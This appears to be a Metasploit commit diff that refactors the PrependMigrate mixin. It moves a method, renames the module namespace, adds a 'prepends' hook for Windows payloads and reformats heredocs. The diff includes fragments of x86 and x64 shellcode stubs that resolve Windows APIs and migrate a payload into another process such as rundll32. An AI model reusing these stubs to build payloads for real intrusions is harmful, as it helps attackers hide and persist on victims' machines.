Make asm spacing easier to read

Also adds a #prepends callback to Payload::Windows to make it a little
clearer what's happening.

lib/msf/core/exploit.rb

@@ -1242,15 +1242,6 @@ class Exploit < Msf::Module
 		not datastore['DisablePayloadHandler']
 	end
 
-	#
-	# Returns the state of the PrependMigrate option
-	# See https://github.com/rapid7/metasploit-framework/pull/917
-	# for discussion.
-	#
-	def prepend_migrate?
-		!!(datastore['PrependMigrate'] && datastore['PrependMigrate'].to_s.downcase == 'true')
-	end
-
 	##
 	#
 	# Handler interaction

lib/msf/core/payload/windows.rb

@@ -12,7 +12,7 @@ require 'msf/core/payload/windows/prependmigrate'
 ###
 module Msf::Payload::Windows
 
-	include Msf::Payload::PrependMigrate
+	include Msf::Payload::Windows::PrependMigrate
 
 	#
 	# ROR hash associations for some of the exit technique routines.
@@ -25,6 +25,18 @@ module Msf::Payload::Windows
 			'none'    => 0x5DE2C5AA, # GetLastError
 		}
 
+
+	# @abstract Override to add additional stubs to prepend to the final
+	#   shellcode. Be sure to call super so other modules may add stubs.
+	# @return [String] Stub to place at the begginning of generated shellcode
+	def prepends
+		""
+	end
+
+	def generate(*args)
+		return prepends + super
+	end
+
 	#
 	# This mixin is chained within payloads that target the Windows platform.
 	# It provides special variable substitution for things like EXITFUNC and

lib/msf/core/payload/windows/prependmigrate.rb

@@ -5,7 +5,7 @@ require 'msf/core'
 # This mixin provides support for generating PrependMigrate blocks for Windows payloads
 #
 ###
-module Msf::Payload::PrependMigrate
+module Msf::Payload::Windows::PrependMigrate
 
 	#
 	# Initialize
@@ -21,27 +21,32 @@ module Msf::Payload::PrependMigrate
 		ret
 	end
 
+	#
+	# Returns the state of the PrependMigrate option
+	# See https://github.com/rapid7/metasploit-framework/pull/917
+	# for discussion.
+	#
+	def prepend_migrate?
+		!!(datastore['PrependMigrate'] && datastore['PrependMigrate'].to_s.downcase == 'true')
+	end
+
 	#
 	# Overload the generate() call to prefix our stubs
 	#
-	def generate(*args)
+	def prepends
 		# Call the real generator to get the payload
-		buf = super(*args)
+		buf = super
 		pre = ''
 
 		test_arch = [ *(self.arch) ]
 
+		if prepend_migrate?
 			# Handle all x86 code here
 			if test_arch.include?(ARCH_X86)
-			# PrependMigrate
-			if datastore['PrependMigrate'] and datastore['PrependMigrate'].to_s.downcase == 'true'
 				migrate_asm = prepend_migrate(buf)
 				pre << Metasm::Shellcode.assemble(Metasm::Ia32.new, migrate_asm).encode_string
-			end
 			# Handle all x64 code here
 			elsif test_arch.include?(ARCH_X86_64) or test_arch.include?(ARCH_X64)
-			# PrependMigrate
-			if datastore['PrependMigrate'] and datastore['PrependMigrate'].to_s.downcase == 'true'
 				migrate_asm = prepend_migrate_64(buf)
 				pre << Metasm::Shellcode.assemble(Metasm::X64.new, migrate_asm).encode_string
 			end
@@ -57,10 +62,10 @@ module Msf::Payload::PrependMigrate
 		procname = datastore['PrependMigrateProc'] || 'rundll32'
 
 		# Prepare instructions to get address of block_api into ebp
-		block_api_start = <<EOS
+		block_api_start = <<-EOS
 			call start
 		EOS
-		block_api_asm = <<EOS
+		block_api_asm = <<-EOS
 		api_call:
 			pushad                    ; We preserve all the registers for the caller, bar EAX and ECX.
 			mov ebp, esp              ; Create a new stack frame
@@ -144,7 +149,7 @@ get_next_mod1:              ;
 			jmp.i8 next_mod           ; Process this module
 		;--------------------------------------------------------------------------------------
 		EOS
-		block_api_ebp_asm = <<EOS
+		block_api_ebp_asm = <<-EOS
 			pop ebp                   ; Pop off the address of 'api_call' for calling later.
 		EOS
 		block_close_to_payload = ''
@@ -156,7 +161,7 @@ EOS
 
 			# Prepare instructions to calculate address
 			ebp_offset = "0x%04x" % (block_api_index + 5)
-			block_api_ebp_asm = <<EOS
+			block_api_ebp_asm = <<-EOS
 				jmp close_to_payload
 			return_from_close_to_payload:
 				pop ebp
@@ -165,14 +170,14 @@ EOS
 			# Clear now-unneeded instructions
 			block_api_asm = ''
 			block_api_start = ''
-			block_close_to_payload = <<EOS
+			block_close_to_payload = <<-EOS
 			close_to_payload:
 				call return_from_close_to_payload
 			EOS
 		end
 
 		#put all pieces together
-		migrate_asm = <<EOS
+		migrate_asm = <<-EOS
 			cld                       ; Clear the direction flag.
 			#{block_api_start}
 			#{block_api_asm}
@@ -273,10 +278,10 @@ EOS
 		procname = datastore['PrependMigrateProc'] || 'rundll32'
 
 		# Prepare instructions to get address of block_api into ebp
-		block_api_start = <<EOS
+		block_api_start = <<-EOS
 			call start
 		EOS
-		block_api_asm = <<EOS
+		block_api_asm = <<-EOS
 		api_call:
 			push r9                  ; Save the 4th parameter
 			push r8                  ; Save the 3rd parameter
@@ -366,7 +371,7 @@ get_next_mod1:             ;
 			mov rdx, [rdx]           ; Get the next module
 			jmp next_mod             ; Process this module
 		EOS
-		block_api_rbp_asm = <<EOS
+		block_api_rbp_asm = <<-EOS
 			pop rbp                   ; Pop off the address of 'api_call' for calling later.
 		EOS
 		block_close_to_payload = ''
@@ -378,7 +383,7 @@ EOS
 
 			# Prepare instructions to calculate address
 			rbp_offset = "0x%04x" % (block_api_index + 5)
-			block_api_rbp_asm = <<EOS
+			block_api_rbp_asm = <<-EOS
 				jmp close_to_payload
 			return_from_close_to_payload:
 				pop rbp
@@ -387,14 +392,14 @@ EOS
 			# Clear now-unneeded instructions
 			block_api_asm = ''
 			block_api_start = ''
-			block_close_to_payload = <<EOS
+			block_close_to_payload = <<-EOS
 			close_to_payload:
 				call return_from_close_to_payload
 			EOS
 		end
 
 		#put all pieces together
-		migrate_asm = <<EOS
+		migrate_asm = <<-EOS
 			cld                       ; Clear the direction flag.
 			#{block_api_start}
 			#{block_api_asm}